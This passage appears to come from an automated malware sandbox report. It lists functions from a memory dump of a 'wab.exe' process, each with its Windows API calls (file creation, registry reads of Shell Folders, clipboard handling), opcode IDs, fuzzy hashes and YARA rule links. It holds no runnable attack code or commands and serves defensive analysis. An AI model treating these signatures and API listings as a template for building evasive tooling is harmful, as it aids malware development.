                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumNamesResource
                                                                                              • String ID:
                                                                                              • API String ID: 3334572018-0
                                                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                              • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                              • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004095FC
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3655998216-0
                                                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1828521557-0
                                                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp
                                                                                              • String ID:
                                                                                              • API String ID: 2081463915-0
                                                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 2136311172-0
                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@
                                                                                              • String ID:
                                                                                              • API String ID: 1936579350-0
                                                                                              • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                              • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                              • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                              • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                                              • CloseClipboard.USER32 ref: 0040997D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                              • String ID:
                                                                                              • API String ID: 2565263379-0
                                                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                              • API String ID: 2780580303-317687271
                                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
